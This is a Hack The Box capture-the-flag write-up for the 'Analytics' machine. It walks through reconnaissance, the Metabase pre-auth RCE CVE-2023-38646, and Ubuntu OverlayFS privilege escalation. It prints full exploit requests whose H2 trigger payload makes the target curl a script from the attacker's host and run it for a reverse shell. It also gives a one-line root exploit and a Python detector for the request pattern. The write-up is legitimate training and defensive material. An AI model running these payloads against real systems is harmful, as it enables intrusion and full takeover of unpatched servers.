title: HTB-Analytics
date: 2023-12-14 12:54:18
categories: HTB
tag: 渗透
Analytics
Information gathering
Run an nmap scan and browse the HTTP service at the same time.
Add the host to /etc/hosts:
10.10.11.233 analytical.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-14 12:55 中国标准时间
Nmap scan report for bogon (10.10.11.233)
Host is up (0.33s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 50.99 seconds
With hosts updated, run a directory scan.
The home page has a login link; after logging in, the domain turns out to be
http://data.analytical.htb/
Add it to hosts as well:
10.10.11.233 data.analytical.htb
The cookie shows the service is Metabase, so we can try
the Metabase remote code execution vulnerability (CVE-2023-38646).
Reverse shell
First, request
http://data.analytical.htb/api/session/properties
to obtain the setup token:
"setup-token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
Then request
http://data.analytical.htb/api/setup/validate
and construct the exploit.
Locally, run python -m http.server 80
and write a 2.sh for it to serve.
POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type:application/json
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=17645f70-ae73-4c86-a81c-ab6fdaa2ccf7
Connection: close
Content-Length: 741
{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl -o /tmp/2.sh http://10.10.14.54/2.sh')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
The target fetches 2.sh with curl and stores it under /tmp.
Then send
POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type:application/json
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=17645f70-ae73-4c86-a81c-ab6fdaa2ccf7
Connection: close
Content-Length: 741
{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /tmp/2.sh')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
The reverse shell connects successfully.
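As an added defender's check that is not part of the original write-up: a test for the precondition the exploit relies on (a setup-token handed out by /api/session/properties) and a detector for the request shape shown above, run over constructed log records. The sample records, the SUSPICIOUS_DB pattern list and all function names are assumptions, not anything from the page or from Metabase.

```python
import json
import re

# Constructed sample records in the shape a reverse proxy or WAF might log
# (method, path, body). The second one mirrors the H2 connection-string shape
# of the write-up's request; the token is a placeholder, not the page's value.
SAMPLE_REQUESTS = [
    ("GET", "/api/session/properties", ""),
    ("POST", "/api/setup/validate", json.dumps({
        "token": "00000000-0000-0000-0000-000000000000",
        "details": {"engine": "h2", "details": {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
                  "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT "
                  "ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nPLACEHOLDER\n$$--=x"}}})),
    ("POST", "/api/setup/validate", json.dumps({
        "token": "placeholder-token",
        "details": {"engine": "h2", "details": {"db": "mem:benign"}}})),
    ("POST", "/api/card", "{}"),
]

# H2 JDBC URL fragments that make a connection string execute code or scripts.
SUSPICIOUS_DB = re.compile(
    r"CREATE\s+TRIGGER|//javascript|\bINIT\s*=|RUNSCRIPT|\$\$", re.IGNORECASE)

def setup_token_exposed(properties_body):
    """True when /api/session/properties hands a non-null setup-token to an
    unauthenticated caller, the precondition the write-up's exploit relies on."""
    try:
        return json.loads(properties_body).get("setup-token") is not None
    except ValueError:
        return False

def inspect_request(method, path, body):
    """Return a reason string if the record looks like CVE-2023-38646 abuse, else None."""
    if method != "POST" or path != "/api/setup/validate":
        return None
    try:
        payload = json.loads(body)
    except ValueError:
        return "non-JSON body sent to the setup validator"
    details = payload.get("details") or {}
    db = (details.get("details") or {}).get("db", "")
    if details.get("engine") != "h2" or not isinstance(db, str):
        return None
    if SUSPICIOUS_DB.search(db):
        return "h2 connection string carries trigger/script content"
    return "h2 engine offered to the setup validator (review)"

def scan(requests):
    return [(p, r) for m, p, b in requests if (r := inspect_request(m, p, b))]
```

Any hit on the first reason is worth an alert on its own; the second is a lower-severity review item, since an H2 engine is rarely a legitimate choice for a production data source.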
Running env reveals the username and password for metalytics,
which can then be used to log in over SSH.
There is nothing of interest inside Metabase itself.
After connecting over SSH, id shows uid 1000.
The flag is in the directory.
Privilege escalation
sudo -l turns up nothing useful.
Running uname shows:
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Some research shows this kernel is affected by
CVE-2023-2640 and CVE-2023-32629
It is enough to run
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
to obtain root privileges.